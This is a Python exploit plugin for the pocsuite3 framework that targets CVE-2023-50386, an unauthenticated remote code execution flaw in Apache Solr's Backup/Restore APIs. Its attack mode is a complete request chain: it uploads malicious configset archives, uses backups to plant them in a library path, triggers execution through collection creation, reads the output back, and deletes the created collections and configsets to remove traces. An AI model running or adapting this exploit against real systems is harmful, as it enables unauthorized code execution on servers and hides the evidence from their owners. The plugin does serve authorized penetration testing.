# -*- coding: utf-8 -*-
# @Time : 2024/2/21 20:47
# @Author : vvmdx
# @File : CVE-2023-50386.py
# @Project : pocsuite3
"""
POC workflow: first check whether the target requires login, then check the
version. If no login is required and the version is in the affected range,
carry out the attack, and finally clean up the traces.
"""
import json
import re

from pocsuite3.api import VUL_TYPE, Output, POCBase, POC_CATEGORY, register_poc, requests

# Browser-like User-Agent sent with every request issued by this POC.
_USER_AGENT = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
)


class SolrPOC(POCBase):
    """pocsuite3 plugin for CVE-2023-50386 (Apache Solr Backup/Restore APIs).

    ``_verify`` only fingerprints the target (unauthenticated access, the
    ZooKeeper admin endpoint answering, and an affected version string).
    ``_attack`` drives the configset-upload / collection-create / backup
    request chain and reads the result back from ``/info/properties``.
    """

    vulID = ''
    version = '1.0'
    author = ['vvmdx']
    vulDate = '2024-02-09'
    createDate = '2024-02-21'
    updateDate = '2024-02-28'
    references = ['https://solr.apache.org/security.html#cve-2023-50386-apache-solr-backuprestore-apis-allow-for-deployment-of-executables-in-malicious-configsets']
    name = 'Apache Solr Backup/Restore APIs 未授权访问导致远程代码执行(CVE-2023-50386)'
    appPowerLink = 'https://solr.apache.org/'
    appName = 'Apache Solr'
    appVersion = '6.0.0 through 8.11.2\n9.0.0 before 9.4.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = ''''''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    pocDesc = ''' 验证模式下判断版本,攻击模式下代码执行 '''

    def _base_url(self):
        """Return ``self.url`` without trailing slashes."""
        return self.url.rstrip("/")

    @staticmethod
    def _headers(**extra):
        """Return the request headers shared by every call, plus *extra*."""
        headers = {"User-Agent": _USER_AGENT}
        headers.update(extra)
        return headers

    @staticmethod
    def _response_status(resp):
        """Return ``(payload, status)`` parsed from a Solr JSON response.

        ``payload`` is the decoded JSON object and ``status`` the value of
        ``responseHeader.status``. Both are ``None`` when the body is not
        JSON or lacks that structure, so callers can treat error pages as a
        plain failure instead of crashing.
        """
        try:
            payload = json.loads(resp.text)
            return payload, payload['responseHeader']['status']
        except (ValueError, KeyError, TypeError):
            return None, None

    def _verify(self):
        """Report the target as vulnerable based on fingerprinting only.

        Success requires that ``/solr/`` and ``/solr/admin/zookeeper`` both
        answer 200 and that the version embedded in the favicon link falls in
        one of the affected ranges.
        """
        result = {}
        url = self._base_url()
        header = self._headers()

        solr_url = url + "/solr/"
        resp_solr = requests.get(solr_url, headers=header, verify=False)
        zk_url = url + "/solr/admin/zookeeper"
        resp_zk = requests.get(zk_url, headers=header, verify=False)

        # 1. Is the admin UI reachable without authentication?
        # 2. Is Solr started in cluster mode (ZooKeeper endpoint answers)?
        if resp_solr.status_code == 200 and resp_zk.status_code == 200:
            # 3. Extract the version number from the favicon cache-buster.
            pattern = re.compile(r'href="img/favicon.ico\?_=(\d+\.\d+\.\d+)"')
            match = pattern.search(resp_solr.text)
            if match is not None:
                version_str = match[1]
                # 4. Check whether the version is in an affected range
                #    (upper bounds are exclusive).
                if (self.check_version(version_str, "6.0.0", "8.11.3")
                        or self.check_version(version_str, "9.0.0", "9.4.1")):
                    # 5. In range: report the target.
                    result['VerifyInfo'] = {'URL': solr_url}
        return self.parse_output(result)

    def get_version_tuple(self, version_str):
        """Convert ``"a.b.c"`` into a tuple of ints for direct comparison.

        Raises ``ValueError`` if any dot-separated part is not an integer.
        """
        return tuple(int(part) for part in version_str.split("."))

    def check_version(self, version_str, low_str, up_str):
        """Return True when ``low_str <= version_str < up_str``."""
        version = self.get_version_tuple(version_str)
        low = self.get_version_tuple(low_str)
        up = self.get_version_tuple(up_str)
        return low <= version < up

    def _attack(self):
        """Run the exploit chain and report the value read back, if any.

        Cleanup runs in ``finally`` so the collection and configsets created
        along the way are removed even when a step fails or raises.
        """
        result = {}
        admin_url = self._base_url() + "/solr/admin"
        try:
            exec_res = self._exploit(admin_url)
        finally:
            self._cleanup(admin_url)

        if exec_res is not None:
            result['VerifyInfo'] = {'result': exec_res}
        return self.parse_output(result)

    def _exploit(self, admin_url):
        """Perform the request chain; return the read-back value or None.

        ``conf1.zip`` and ``conf2.zip`` are opened relative to the current
        working directory (see ``upload``).
        """
        # 1. Upload the first configset archive.
        if not self.upload(admin_url + "/configs?action=UPLOAD&name=conf1", "conf1.zip"):
            return None

        setup_urls = (
            # 2. Create a collection from conf1.
            admin_url + "/collections?action=CREATE&name=collection1&numShards=1&replicationFactor=1&wt=json&collection.configName=conf1",
            # 3. Backup, step one.
            admin_url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/&name=collection2_shard1_replica_n1",
            # 4. Backup, step two (named "lib" inside the first backup's directory).
            admin_url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/collection2_shard1_replica_n1&name=lib",
        )
        # all() over a generator stops at the first failing step.
        if not all(self.action(step_url) for step_url in setup_urls):
            return None

        # 5. Upload the second configset archive.
        if not self.upload(admin_url + "/configs?action=UPLOAD&name=conf2", "conf2.zip"):
            return None

        # 6. Execute: creating collection2 from conf2. The flow continues
        #    only when this request answers 400.
        header = self._headers()
        exec_url = admin_url + "/collections?action=CREATE&name=collection2&numShards=1&replicationFactor=1&wt=json&collection.configName=conf2"
        resp_exec = requests.get(exec_url, headers=header, verify=False)
        if resp_exec.status_code != 400:
            return None

        # 7. Read the echoed output back from the system properties.
        resp_read = requests.get(admin_url + "/info/properties", headers=header, verify=False)
        if resp_read.status_code != 200 or "root:" not in resp_read.text:
            return None
        try:
            return json.loads(resp_read.text)['system.properties']['java.library.path']
        except (ValueError, KeyError, TypeError):
            # Unexpected body shape: treat as a failed attempt, not a crash.
            return None

    def _cleanup(self, admin_url):
        """Delete the collection and configsets created by the attack."""
        header = self._headers()
        resp_del = requests.get(admin_url + "/collections?action=DELETE&name=collection1",
                                headers=header, verify=False)
        # The collection must be removed first; the order in which the two
        # configsets are deleted afterwards does not matter.
        if resp_del.status_code == 200:
            requests.get(admin_url + "/configs?action=DELETE&name=conf1", headers=header, verify=False)
            requests.get(admin_url + "/configs?action=DELETE&name=conf2", headers=header, verify=False)

    def action(self, action_url):
        """GET *action_url*; return True when Solr reports success.

        Success means HTTP 200, ``responseHeader.status == 0`` and a
        top-level ``"success"`` key. Non-JSON or malformed bodies count as
        failure.
        """
        resp = requests.get(action_url, headers=self._headers(), verify=False)
        if resp.status_code != 200:
            return False
        payload, status = self._response_status(resp)
        return status == 0 and "success" in payload

    def upload(self, upload_url, file_name):
        """POST the file *file_name* to *upload_url* as the raw request body.

        Returns True on HTTP 200 with ``responseHeader.status == 0``; non-JSON
        or malformed bodies count as failure. Raises ``OSError`` (for example
        ``FileNotFoundError``) if *file_name* cannot be opened.
        """
        header = self._headers(**{"Content-Type": "application/octet-stream"})
        with open(file_name, "rb") as file:
            # Send the zip's binary data directly as the POST body.
            resp = requests.post(upload_url, headers=header, data=file, verify=False)
        if resp.status_code != 200:
            return False
        _, status = self._response_status(resp)
        return status == 0

    def parse_output(self, result):
        """Wrap *result* in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Target is not vulnerable')
        return output


register_poc(SolrPOC)